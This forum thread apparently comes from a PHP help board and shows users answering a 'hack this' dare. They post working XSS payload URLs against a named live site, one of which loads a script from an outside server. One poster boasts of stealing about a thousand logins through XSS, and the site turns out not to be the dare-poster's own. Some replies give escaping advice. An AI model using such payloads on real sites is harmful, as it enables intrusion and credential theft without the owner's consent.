hack this...

[phpSensei]

I bet you cant..

 

made it in 5 mins

 

http://www.theinsomniaxe.com/hoast/

[agentsteal]

Cross Site Scripting:

http://www.theinsomniaxe.com/hoast/index.php/"><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting if the filename contains code.

 

Cross Site Scripting:

There is Cross Site Scripting in the image upload.

 

Full Path Disclosure:

Warning: array_sum(): The argument should be an array in /var/www/vhosts/theinsomniaxe.com/httpdocs/hoast/index.php on line 150

[Aureole]

Haha, sorry but that's just great.

[phpSensei]

even with that XSS you cant do anything.

 

seriously show me one that would ruin my site. NOTHING!!!

[teng84]

how do you want us to hack that.. that is only a single page that only upload images ....?

[Azu]

bet you cant..

[Lumio]

Do you really agree that we are allowed to hack your webserver?

[Zelphics]

im not sure there is enough php content on this site to make it easily hackable.

[Azu]

lol? Look up at the top of the thread. He got owned. Still hasn't even fixed any of that ROFL.

[obsidian]

even with that XSS you cant do anything.

 

seriously show me one that would ruin my site. NOTHING!!!

 

Your wish is my command:

 

http://www.theinsomniaxe.com/hoast/index.php/%22%3E%3Cscript%20type='text/javascript'%20src='http://sandbox.guahanweb.com/scripts/hack.js'%3E%3C/script%3E

 

For me to be able to include a javascript file from my server is insanely dangerous. I could make your site look like anything I wanted it to. What's more, I wouldn't necessarily have to change the functionality of it, I could just add a couple form fields and have the data sent to me instead of you. There are many more dangers to leaving your site open than just having your server hacked.

[thryb]

ouhahaha

Thanks Ob that was H.I.L.A.R.I.O.U.S lolol

Seriously, awesome.

[Azu]

even with that XSS you cant do anything.

 

seriously show me one that would ruin my site. NOTHING!!!

 

Your wish is my command:

 

http://www.theinsomniaxe.com/hoast/index.php/%22%3E%3Cscript%20type='text/javascript'%20src='http://sandbox.guahanweb.com/scripts/hack.js'%3E%3C/script%3E

 

For me to be able to include a javascript file from my server is insanely dangerous. I could make your site look like anything I wanted it to. What's more, I wouldn't necessarily have to change the functionality of it, I could just add a couple form fields and have the data sent to me instead of you. There are many more dangers to leaving your site open than just having your server hacked.

Actually you are making it sound rather tame. It can much more dangerous then that. When a pretty short line of code in the wrong place, you could potentially get the username and password of everybody that goes to that page (if you store login data in cookies).

 

I did this once on a site purely as a learning experience to see if I could do it. Got like a thousand usernames/passwords in the few hours I had it on there =O

 

And it doesn't matter if the passwords are hashed, either; you can decrypt them with a rainbow.

 

Exploits like this are very real and very dangerous. And they can be solved by just writing ONE SINGLE WORD INTO YOUR PHP SCRIPT; htmlentities

[thryb]

what do you mean by fixed with a single word ? htmlentities

Dont you need to parse and replace the chars and stuff ?

[Azu]

I mean you just put htmlentities there.

 

Like instead of echo $_GET['input'];

You would put echo htmlentities($_GET['input']);

 

That's really all you need to do to make this kind of attack virtually impossible.

[eXeCuTeR]

In case I found an XSS, what could I possibly do to the website?

Could I edit it or access the DB or something?

Please give an example to a string the does the same thing.

[thryb]

Oh didnt know that, and in that case, the xss is made from right after index.php like this one, there is no  $_GET really right ? How can you fix it?

 

Sorry I dont wanna bum someone else post but since we're on it

[thryb]

I dont think this is an appropriate place to talk about how to hack with XSS there is a lot of doc on xss hacking on the net, just google it.

 

[eXeCuTeR]

I dont think this is an appropriate place to talk about how to hack with XSS there is a lot of doc on xss hacking on the net, just google it.

 

 

Hmm, OK, sorry then

I'll google it, thanks.

[Azu]

Oh didnt know that, and in that case, the xss is made from right after index.php like this one, there is no  $_GET really right ? How can you fix it?

 

Sorry I dont wanna bum someone else post but since we're on it

I'm not sure what you're trying to ask, sorry.

 

Just use htmlentities on any user-submitted info you output in PHP and you'll be fine.

[phpSensei]

This wasnt even my site, I just wanted to see what professionals can do with XSS...

[obsidian]

This wasnt even my site, I just wanted to see what professionals can do with XSS...

 

Then, your post was in direct violation of the forum guidelines. You are not to be posting sites that are not your own for the purpose of having them "tested."

[gtal3x]

This wasnt even my site, I just wanted to see what professionals can do with XSS...

LOL dident expect that, thats was just stupid....

[thryb]

Thats very smart, if whoever that tested it get reported... never thought about that ?!

[phpSensei]

I didnt want to get in trouble for hacking it.

 

You think my coding is that sloppy lol?

[dbo]

You sound like a 14 year old kid trying to cover up their mistakes.